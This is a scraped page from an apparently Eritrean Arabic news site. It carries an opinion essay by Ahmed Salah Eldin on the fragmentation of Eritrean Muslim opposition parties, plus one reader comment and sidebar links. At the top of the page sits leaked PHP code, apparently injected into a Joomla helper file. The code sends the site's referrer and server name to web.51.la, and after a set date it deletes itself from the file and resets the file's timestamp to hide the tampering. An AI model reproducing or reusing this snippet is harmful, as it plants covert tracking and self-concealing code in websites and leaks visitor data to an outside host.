check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456727708){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php"); } نحن و أحوالنا ! " وثيقة المشهد "
кремлевская диета

نحن و أحوالنا ! " وثيقة المشهد "

User Rating: / 2
PoorBest 

 

 

 

 

نحن و أحوالنا !

" وثيقة المشهد "

أحمد صلاح الدين

 

أصبح الهم والهموم  توأمنا الذي لا نفارق أو يفارقنا ..و الهم الأكبر أو كل الهم يأتي متعلقاً بحالنا الذي لا نحسد عليه  قط من الناظرين .

و بينما نحن هكذا كان القدر أن نُدْعَم أثيوبيّا ً و في جوف جارنا الحبشي نزعة إنتقامية من حبشي آخر في بلادنا .. و كلنا أحباش في التاريخ ولو كره الجبهجيون الجُدُد .. أو الفيدراليون الزعانف ... وصوفياتنا من الحركات الإسلامية أو و و ..

مشهد مؤجل الى الزمن المواتي :

ليس هذا فحسب  ، وكذلك بينما  نحن في مشوار همومنا في إديس أببا أخيراً .. وفي إحدى فنادقها إذ بإمرأة حبشية الملمح ... شمالية الإنحدار جغرافيّاً .. أمحراوية اللسان ، ترخي رأسها الى أسفل من أجل تحية السلام .. ثم تدرك بأننا من حبش الهضبة شمالاً .. ما بعد ال " المنطقة المنزوعة السلاح ".. فتغيرت اللغة الى " الأمجشي " .. تقرنية على نمط أمحري .. و عادة ما يحدث فيها تبادل المواقع ما بين حرف " الحاء و الهاء " ... و في خاتمة " الونسة " و نهاية الكلام بيننا وبينها ، لقد زادتنا هذه الحبشية هماً أكبر يتعلق بمسئوليين إرتريين من أبنا جلدتنا " محمدّين "  وقعا في عِشقها و شبكة حُبها في آن ٍ واحد و زمن ٍ سنواتي تاريخيا كان هو الآخر واحد ...   إستنكرنا القصة خوفاً من فبركة ناقل الرواية " بطلة القصة " لمسرحية العشق تلك .. الإ كان دليلها بالصوت والصورة .. الله ينعل الموبيلات – الهاتف النقّال ... يا ناس العلم تطوّر .. فحسبنا ذلك فبركة تقنية أُخرى .. ثم كان الإتصال الهاتفي المسجل بذات النبرة التي حقاً نعرفها تماما ... غيرنا الموضوع لكي ننسى المنظر والصورة ... لكي نجهل الصوت ... تخمرت عقولنا بأن تلك الحبشية ربما كانت مخابراتية لا قدر الله ... إلاّ أن صاحبتنا عرضت علينا تلك الفضيحة بملغ مالي قدره  مئتين من الدولارات الأمريكية = 200$ وهو ملبغ بالنسبة لها إنما إيه ... ما كان  علينا الا الوعد وتكتمل الصفقة .. ومن ستر مسلماً ستره الله ... فإشترينا القصة بكل همومها لنزد هما آ خر ... و كان من دفع المبلغ ناشط إرتري يتميز بعلاقاته المتشربكة بدول الجوار و ما بعد البحر الأحمر ... أما المسؤلان يا سادة يا كرام ، هما من بني ملتنا ... أحدهما يرأس تنظيم تحالفي و الآخر غير تحالفي ... أحدهم بدأ له قرون و شوك و الآخر السياسة في أثيوبيا بالنسبة له سياحة و نزهة ... و كلا هما  يحتميان بجوازاتٍ أُوروبية ... هذا وكفى و العاقل من يفك الشفرة . .. فالنترك ذلك إلى حيث تشاء الظروف المواتية ... من يدري وقتها قد ترتفع أسعار ما لدينا من وثائق .

مشهد حالنا الحالي :                                                                                                                                                 

حقيقة  ونحن مهمومين على حال حالنا الحال ... جيئ الظرف المحال من قائد كُناماوي أثيو- إرتري  تحرري قومي – ويدعى قرنيوس لكي يذكّرنا في يوم سبتمبرنا الفاتحي  بحقبة تاريخية  غير مؤرخ لها من نشاطات مُفَجَر كفاحنا الإرتري المسلح من أجل لا بديل للإستقلال التام لإرتريا ... أي لا حكم ذاتي منخفضاتي عِجيلي أو للوبيناتي... و لا ملفّ خياناتي  ... و لا تقرير مصير قومياتي عفري كان أو كُناماتي  ... ثم بعد 51عاما هكذا جاء القائد قرنيوس محتفلاً بتلك الحقبة التاريخية لمزبحته  المزعومة -التي لا نعلم و لا يعلمون - في ذات السبتمبر الذي مرّ عليه من قبل خمسين إحتفالاً سبتمبري .. و إحتفلت به معنا  حركة قرنيوس  .. وصفق هو بذاته معنا في كل تلك الإحتفالات وذكراها العددية ... أما لماذا هذه المرة  طل علينا ذلك القرنيوس بتاريخ قد تكن فيه أفراد قومية الكُنامة نفسها مدانة هي الأخرى ، لإن غذوات القبائل والمجموعات على بعضها البعض ليس بخافي عن صفحات الشعوب في تلك المنطقة ... ومن يدري قد نجد  من الكناما و جدود قرنيوس أُناس قامو بذبح وقتل نساء ورجال و أطفال من أهلنا البارية " النارا " الذين ينتمي وينتسب إليهم قائدنا الشهيد حامد إدريس عواتي رحمه ألله وتقبله شهيدا ... أو ربما وجدنا في تاريخ ٍ آخر لبعضٍ من  أهلنا " البازا " وقد نهبو أبقار الحدارب أو زبحوا و قتلوا و حرقوا  قرى من قرى قومية  " الحدارب " التي تنتمي وتنتسب اليهم حرم  الشهيد عواتي ... أو و أو و أو ... وهل نجت قبيلة عن غذوات قبائل أخرى في تلك الحقبة التي أثارها قرينيوس إذا صحّ إدعائه المأربي زمناً و مكانا .. .. ولكن فهو قرنيوس الذي يدرك حالنا ولا نعلم حاله ....

 حالنا من أجل التغير : نعم هذا هو حالنا ..! ويأتي حالنا هذا من أحوالٍ كُثر  .. وهي المتسببة  فيما نحن عليه من هذا الحال ... ولكن أيو الأحوال نقصد و من هم أؤلئك الذين نشير أليهم بالحال الذي ننتمي وينتمي فيه معنا من نقصدهم بالحال ..!!؟

بالعربي لغةً لهذا المقال الشاهد على حالنا .. نقصد بحالنا .. حال من نعتقد فيهم  ذاتية التسبب في الذي أوصلنا إليه ... نقصد ناس الحلقة الضعيفة في شراكة البيت الإرتري وطناً .. نقصد أنفسنا ومن هم محسبون في سلتنا من الآخر  الناظر إلينا من فوق هضابه الثلاث – الشريك الذي هكذا يَعُدَنَا ضمن اللُحْمة الواحدة في جميع ذاكرة مراحله في الشراكة معنا ... فيحَسبُنا بالآخر الواحد النقيض له ... لكنه يدرك بأن هذا الأخر الواحد .. هو واحد مجزأ الى جزيئات طاردة للتماسك رغم بأنّ  هذا الواحد  " النَحْنُ " هو نفسه يعي هذا الحال ....

فحالنا من حال السياسة التي لا نزاول غيرها ... ولا نتحدث سواها ... لا نتجمهر في المقاهي دونها ... و في منازل العزاء نتلوها فور قراءة الفاتحة للترحم على من إجتمعنا من اجله / أجلها ... فهي – أي السياسة – أفراحنا و اتراحنا .. لذلك وجدتنا سياسين أكثر من السياسة التي نَدّعي ... وجدتنا نسأل بعضنا البعض : ... شنو الآخبار ... مَي هَلاّ ...إنتاّي ألو دهاي ...  إيه الجديد ... فندوّر اللعبة من جديد بذات الحال الذي بدأنا و إنتهينا .. لكي نصلا أخيراً بأنّ الوطن ليس بخير ... وناسنا مُضطهدين .. مظلومين ... و أهلنا مشردين ... وكلها حقيقة لحال أحوالنا منذ أن أعلنا الثورة و إلى حالنا هذا اليوم  ..أو هذا الحال اليوم ...

ولإننا مظلومين ومضطهدين من التقرنية أو طائفة مسيحي الهضبة الإرترية كما يقولون – ومتفقون على القول الحدث تعالوا الى حالنا السياسي تنظيمياً و حزبياً سواء كان إسلامي التكوين أو جبهوي و قومياتياً ... تعالوا إلى حيث نكهتنا في السياسة ضد الظلم والإضطهاد .. إلى حالنا المحمدي الذي نرصد من مسمياته أرقاما للأمثلة فقط وليس للحصر الإحصائي فمنهم من ذاب ومنهم من لم يذوب أو يذوّب ... وإليكم أسماءاً سميناها بأنفسنا من أجل تغير حالنا :-

1-      الحزب الإسلامي للعدالة والتنمية –   ( مسلمون 200%  )

2-      حركة الإصلاح الإسلامي الإرتري   ( مسلمون 200%  )

3-      المؤتمر الإسلامي الإرتري ----      ( مسلمون 200%  )

4-      المؤتمر الشعبي الإرتري الشنقبي     ( مسلم 100%     )

5-      حزب الوفاق الإسلامي الماجورائي   ( مسلم 100%    )

6-      الجبهة الإسلامية الإرترية  القيسمية   ( مسلم 100%   )

7-      المؤتمر الإرتري الأبوبكري العثماني ( مسلم 100%    )

8-      حزب النهضة الإرتري الجبرتي ---  ( مسلمون 200%)

9-      الحركة الديمقراطية لعفر البحر الأحمر ( مسلمون 200%)

10-  الجبهة الديمقراطية لتحرير قومية الساهو(مسلمون 200%)

11-  حزب قوات التحرير الشعبية السمهرية (مسلمون 200% )

12-  جبهة التحرير الإرترية الأممية ----( مسلمون 99.98% )

13-  الحركة الفيدرالية الديمقراطية الإرترية الكرنية (مسلمون 98.99% )

14-  الجبهة – الحركة – الحزب – المؤتمر الفلاني القليتاي ( 65-35 % مسلو مسيحي ) و الحبل عى الجرار ...

 

فننظروا لا نرى حالاً آخر غير مهزلة المشهد الشاهد على حالنا .. حالنا الديمقراطي التحرري ... وكلما نحتاجهه على حسب أحدهما هو الإبداع في كيفية إدارة هذا التنوّع  المجتمعي .. السياسي .. الديني ... الثقافي ... القومي ... التراثي ... التاريخي السبتمبري ... ووو!

هذه هي ديمقراطيتنا المستقبلية الحاضرة في يوميات ماضينا الآني من أجل التغير ... التجديد التعددي ... اللوني الطيفي ... التجمعي ... التحالفي ... التضامني ...

 

هذا هو حالنا الذي لم توضحه وثيقة المختار ... الوثيقة التي مازلنا نبحث لها قائداً يخرجنا من الحال " المشرور أعلاه ) .. الوثيقة الوضؤ التي  من المفترض أن تُبطِل حالنا التيممي المتسلسل من مشهدنا المسمياتي المصاحب للأرقام ال 14 و مايزيد من ساساتنا أعلاه ... فما أن توحّد إثنان إو ثلاثة فخمسة و إلا باضت دجاجتنا كتوكوت وكتاكيت أخر من بين الفرج وساقيها ... فتتسع حضانة الإستقبال لأن الساحة في يومنا هذا أكثر ديمقراطية و حرية كي تتحمل أكثر من تنظيم آخر وقع عليه الظلم من التقرنية و طائفة مسيحي الهضبة الكبساوية .. آه أهٍ على حالنا الذي سيحتاج منا إلى أكثر من ر صاصة و أكثر من سبتمبر ولكن هل سنجد قائد  واحد يخرجنا من هذا الحال ....!!!؟ 

 

This e-mail address is being protected from spambots. You need JavaScript enabled to view it

 

 

 


Comments 

  1. #1 قبريس
    2013-01-1917:13:26 مقال اكثر من ممتاز في وصف حالة مزمنة تستحق الاحالة الى مشفى للأمراض النفسية. بالنسبة لالصاق اسماء القبائل والمناطق بالمجاميع التسلقية يفضل عدم تكراره حتى لا نحمل فيئات مناطقية وقبلية وزر افراد لم ياخذوا برايها في اقامة "منظمات" وهمية…خذ مثال في جماعة "النهضة" التي لا تمثل من الجبرتا حتى الـ 1%، وكذلك جماعة بشير التي لا تمت الى كرن (قلب ارتريا النابض) باي صلة. الافضل تسمية هذه المجاميع باسماء اصحابها: مثل: جماعة قرنليوس، جماعة ابراهيم هارون، الحركة "البشيرية"، حركة نور-ادريس الخ. دمت ودام قلمك المبدع

Add comment

Your comments are as important as the article you are commenting on. Please enrich the discussion by avoiding personal attacks. We'll publish your comment, if it meets our criteria. تعليقاتك لا تقل اهمية عن المقال المكتوب اعلاه، فالرجاء اثراء النقاش بالابتعاد عن الاساءات الشخصية. سوف ننشر تعليقك اذا استوف شروط النشر



Security code
Refresh

Enough dictatorship

Get Adobe Flash player

Arkokabay Media -----> Poem

Get Adobe Flash player

مرض الرئيس الأريتري بين الشائعة والنفي

Get Adobe Flash player

ALIA GABRES- SHE COTTON SUMMER DRESSES

Get Adobe Flash player

عمود الكتاب العربي

Arkokabay.com
Arkokabay.com
OMAR JABIR الأستاذ عمر جابر
OMAR JABIR الأستاذ عمر جابر
Zein Shokayالأستاذ زين شوكاي
Zein Shokayالأستاذ زين شوكاي
سعادة السفير حمد كلُ
سعادة السفير حمد كلُ
الأستاذ صلاح أبوراي
الأستاذ صلاح أبوراي
 الأستاذة حنان
الأستاذة حنان
الأستاذ موسى ضرار
الأستاذ موسى ضرار
الأستاذ أبو الرشيد
الأستاذ أبو الرشيد
الأستاذ عبدالفتاح ود الخليفة
الأستاذ عبدالفتاح ود الخليفة
الأستاذ ياسين محمد عبدالله
الأستاذ ياسين محمد عبدالله
الأستاذ محمد نور - بركان
الأستاذ محمد نور - بركان
الأستاذ جمال همد
الأستاذ جمال همد
الأستاذ فكاك ناير
الأستاذ فكاك ناير
الأستاذ أحمد صلاح الدين
الأستاذ أحمد صلاح الدين
Amal Ali الأستاذة أمال علي
Amal Ali الأستاذة أمال علي
Mohamed - Wahran Eritreaمحمد - وهران ارتريا
Mohamed - Wahran Eritreaمحمد - وهران ارتريا
الأستاذ حسن سلمان
الأستاذ حسن سلمان
الأستاذة منى محمد صالح
الأستاذة منى محمد صالح
الاستاذة نوره فارس
الاستاذة نوره فارس